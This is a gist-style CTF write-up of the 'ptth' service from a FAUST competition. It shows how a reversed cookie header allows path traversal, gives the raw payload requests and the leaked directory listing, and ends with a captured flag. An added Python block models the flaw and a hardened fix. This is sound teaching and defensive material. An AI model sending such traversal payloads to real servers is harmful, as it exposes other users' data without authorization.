@vladvis
Created May 29, 2019 15:24
ptth

We noticed that the server logs debug info to stdout. Our first idea was path traversal, because the server stores files under names taken from the request: path = './' + eikooc + '/' + path. Path traversal in the path part didn't work at all, but eikooc (the reversed cookie) was used as the user directory. So we sent this payload:

TEG / PTTH\1.1
eikooc: ../

And we got log message:

[PID 19] [] TEG  SERVER

TEG / PTTH\1.1

eikooc: eikooc: ../

found cookie
[PID 20] [] Fucked up cookie. CLIENT

OK, we checked the condition that triggers this message:

if (some_function(some_ptr) == 15)
{
  ...
} else {
  throw_error("Fucked up cookie.");
}

Hmm, it looks like some_function is just strlen and some_ptr is the eikooc pointer, so the cookie only has to be exactly 15 characters long. Finally we sent this payload (with exactly 15 slashes in eikooc):

TEG / PTTH\1.1
eikooc: ////////////////////

PTTH\0.1 2 KO
eikooc: ///////////////
eicookh: 093edf9115dc3ca072233b96e38f2752

<html><head>
<title>Index of data</title>
</head><body>
<h1>Index of data</h1>
<a href="./">(Parent Directory)</a><br>
<a href="data/MskBs9WDwWdlj1p">MskBs9WDwWdlj1p</a><br>
</body></html>

Got it! This request lists all usernames, and now we can extract all flags the same way the jury does.
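To make the bug concrete, here is an added Python model of the check described above (not the service's own code; the function names, the data root "data" and the assumption that a legitimate cookie is 15 alphanumeric characters are mine). The vulnerable version mirrors path = './' + eikooc + '/' + path guarded only by a length check, so 15 slashes normalize to the shared data root; the hardened version validates the cookie's charset and confirms the resolved path stays inside the user's directory.

```python
import posixpath
from typing import Optional

# Constructed model of the service's check: the cookie must be exactly 15 chars.
COOKIE_LEN = 15
DATA_ROOT = "data"  # assumed name of the directory holding all user directories


def vulnerable_resolve(eikooc: str, path: str) -> Optional[str]:
    """Mimics path = './' + eikooc + '/' + path with nothing but strlen == 15.

    Returns the normalized path the server would use, or None when the
    cookie fails the length check (the "Fucked up cookie." branch).
    """
    if len(eikooc) != COOKIE_LEN:
        return None
    # Only a length check: '/' * 15 passes and collapses to '.', the data root.
    return posixpath.normpath("./" + eikooc + "/" + path)


def hardened_resolve(data_root: str, eikooc: str, path: str) -> Optional[str]:
    """Same lookup with two extra defenses.

    1. The cookie must be 15 alphanumeric characters (assumed user-id format),
       so '/' and '..' never enter the path.
    2. After normalization the result must still lie under the user's own
       directory; anything else (../ or an absolute path) is rejected.
    """
    if len(eikooc) != COOKIE_LEN or not eikooc.isalnum():
        return None
    user_root = posixpath.normpath(posixpath.join(data_root, eikooc))
    candidate = posixpath.normpath(posixpath.join(data_root, eikooc, path))
    # Containment check: exactly the user root, or a descendant of it.
    if candidate != user_root and not candidate.startswith(user_root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample requests: a normal user lookup and the 15-slash cookie.
    print(vulnerable_resolve("MskBs9WDwWdlj1p", ""))   # MskBs9WDwWdlj1p
    print(vulnerable_resolve("/" * 15, ""))            # . (listing of every user)
    print(hardened_resolve(DATA_ROOT, "/" * 15, ""))   # None
```

posixpath is used instead of os.path so the normalization is deterministic on any platform and needs no files on disk; in a real handler the same containment check should be done on the realpath after symlink resolution.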

Our FB: FAUST_XOlUOAUHYk6BugAAAABMr89BM6YmLUIM
